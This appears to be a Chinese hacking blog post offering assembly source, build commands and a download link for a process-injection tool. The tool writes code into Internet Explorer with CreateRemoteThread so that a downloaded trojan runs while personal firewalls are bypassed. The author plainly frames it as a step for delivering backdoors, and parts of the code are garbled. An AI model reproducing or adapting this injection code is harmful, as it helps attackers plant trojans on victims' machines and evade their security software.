进程注入:注入下载文件的代码到IE进程然后执行下载的文件

大家可能都用过网页木马来下真正EXE木马吧但是有些时候
后门比较大下载时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个
下载地址

http://www.chinansl.com/czy/bin.rar

还要改下才好用哈,不过只有2kb很小了

编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj

刚才测试了下可以逃过天网应用防问网络限制金山网镖也肯定没问题


; #--------------------------------------# #
; # Injection downloadcode in IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# #

;test _disibledevent=> Rproc proc msgbox ;MessageBoxA地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX+dispdata]
LEA EDX,[EBX+szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebegin ;代码长度xx字节

start:
;invoke FindWindow,0,off tit ;返回计算器窗口句柄
invoke FindWindow,off tit,0
invoke GetWindowThreadProcessId,eax,off pid ;计算机器进程PID号
;invoke wsprf,off szBuffer,off szFormat,pid ;把PID用十进制显示
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄


invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
invoke WriteProcessMemory,hProcess,pCodeRemote,off codebegin,codelen,NULL

mov esi,pCodeRemote
add esi,datalen
push esi
invoke LoadLibrary,off userdll
invoke GetProcAddress,eax,off szmsg
pop esi
invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0

mov hThread,eax ; 返回线程句柄
. hThread
invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束
invoke CloseHandle,hThread ;关闭线程句柄
.end

invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
invoke CloseHandle,hProcess ;关闭进程句柄
invoke WinExec,off path1,SW_SHOW ;以正常方式执行下载木马到时候改下就没窗口了
;invoke MessageBoxA,0,off szBuffer,off szBuffer,1
invoke ExitProcess,0
end start



  • 篇文章: 半开扫描

  • 篇文章: 超小简单渗透asp后门.asp
  • Tags:  asp防注入代码 sql注入代码 防注入代码 进程注入

    延伸阅读

    最新评论

    发表评论